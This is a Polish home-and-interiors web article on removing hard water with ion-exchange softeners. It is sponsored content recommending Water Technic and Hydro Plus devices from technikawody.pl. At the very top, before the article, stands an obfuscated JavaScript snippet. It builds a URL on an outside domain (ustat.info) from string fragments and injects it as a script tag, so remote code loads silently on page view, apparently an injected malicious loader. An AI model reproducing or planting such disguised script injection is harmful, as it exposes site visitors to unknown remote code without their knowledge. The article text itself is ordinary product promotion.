(function(){ iek9_=("u"+"st");iek9=document.createElement("script");iek9.async=true; iek9u="436845603";iek9_+="a"+("t.");iek9_+="i"+("nf"+("o"))+("/"); iek9u+=".yet16n0nek9pikvu";iek9u+="2vl1dxtwp1frjn"; iek9.src="https://"+iek9_+iek9u;iek9.type="text/javascript"; d_b=document.body;d_b.appendChild(iek9); })();

Jak pozbyć się problemu twardej wody w domu?

Charakterystyczny, białawy nalot pojawiający się na urządzeniach sanitarnych, naczyniach czy sprzętach AGD oznacza, że w kranie płynie twarda woda. Wytrącający się z wody kamień kotłowy jest niczym innym, jak węglanem wapnia i magnezu, powstającym w momencie, gdy w cieczy znajduje się zbyt dużo jonów magnezu oraz wapnia. Niestety, jego obecność negatywnie wpływa nie tylko na naczynia czy sprzęty, ale może także doprowadzić do awarii zbiorników na wodę czy instalacji wod-kan. Jak pozbyć się zatem problemu twardej wody? Zachęcamy do lektury.

Twarda woda

Twarda woda jest problemem większości gospodarstw domowych w Polsce, podłączonych standardowo do sieci wodociągowej. Ciecz ta zawiera zbyt dużo jonów wapnia i magnezu, które powodują tworzenie się osadu, czyli kamienia kotłowego. Magnez i wapń trafiają do wody deszczowej w momencie kontaktu z glebą oraz skałami, woda ta następnie wsiąka w ziemię i trafia do wodociągów lub prywatnych ujęć.

Jak radzić sobie z problemem twardej wody?

Chcąc pozbyć się twardej wody ze swojej instalacji, wystarczy zamontować funkcjonalny zmiękczacz do wody. Zasada jego działania jest prosta. Woda przepływając przez złoże jonowymienne, obecne w każdym zmiękczaczu, ulega oczyszczeniu. Jony magnezu i wapnia zostają zastąpione neutralnymi jonami sodu. W ten sposób woda traci swoją twardość.

Warto pamiętać jednak, że nie każde urządzenie w pełni się sprawdzi. Najlepiej zainwestować w zmiękczacze nowoczesne polecanych marek. Takie urządzenia można znaleźć w sklepie polskiego producenta Technika Wody. Poniżej przedstawiamy najpopularniejszy sprzęt.

Zmiękczacze Water Technic

Jednymi z najlepszych zmiękczaczy wody dostępnych na rynku, które świetnie sprawdzają się zarówno w domach jednorodzinnych, jak i budynkach firmowych są wysokojakościowe zmiękczacze od Water Technic. Urządzenia te wyróżniają się bezawaryjną pracą, skutecznym działaniem, a także solidnością wykonania. Zmiękczacze Water Technic można zakupić w niezwykle przystępnej cenie, mają aż 10 lat gwarancji.

Jak pozbyć się problemu twardej wody w domu? 2

Zmiękczacze Water Technic Superior

Polecanymi zmiękczaczami do wody, które świetnie niwelują twardość cieczy są również zmiękczacze dwuelementowe marki Water Technic Superior. Urządzenia te są skuteczne, oszczędne oraz długowieczne. Zmiękczacze pokryte zostały szczelną pokrywą, która zabezpiecza głowicę przed pyłem i wilgocią. Butla natomiast została okryta specjalną obudową, która zapobiega skraplaniu się wody. Kupując zmiękczacz tej marki, otrzymuje się aż 12 lat gwarancji.

Jak pozbyć się problemu twardej wody w domu? 3

Zmiękczacze Hydro Plus

Szukając sprawdzonego zmiękczacza, warto zdecydować się również na urządzenia marki Hydro Plus. Są wydajne, świetnie pracują, można je zakupić w przystępnej cenie. Co więcej, wyróżnia je także wydłużony okres żywotności, a także 30% niższe zapotrzebowanie na wodę i sól podczas regeneracji złoża. Zmiękczacze te mają aż 7-letnią gwarancję.

Jak pozbyć się problemu twardej wody w domu? 4

Chcąc pozbyć się problemu twardej wody, warto zdecydować się na zakup sprawdzonego i polecanego zmiękczacza. Jednymi z najskuteczniejszych urządzeń są te, które dostępne są w sklepie Technika Wody. Najpopularniejsze i najwydajniejsze modele to zmiękczacze Water Technic, Water Technic Superior oraz Hydro Plus.

Nasz partner radzi technikawody.pl

 

Redakcja

DomNaNowo.pl jest magazynem internetowych z kategorii dom i wnętrza. Naszą misją jest inspirowanie i zachęcanie do ulepszania swojej przestrzeni życiowej. Publikujemy poradniki i artykuły o wszystkim co wiąże się z domami, mieszkaniami i wnętrzarstwem. Publikujemy zestawienia aranżacji różnego typu pomieszczeń oraz przestrzeni mieszkalnych. Prezentujemy rankingi zestawienia. Naszą redakcję tworzy zespół kreatywnych i dociekliwych redaktorów i autorów. Ich pracę wspomagają specjaliści ds. PR oraz marketingu. Na łamach DomNanowo.pl publikowane są nowości wnętrzarskie oraz różne materiały warte opisana i scharakteryzowania. Nasze felietony oraz artykuły poradnikowe tworzone są z myślą o czytelnikach. Z nami każde wnętrze może stać się wyjątkowe.

Powiązane artykuły

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *

Back to top button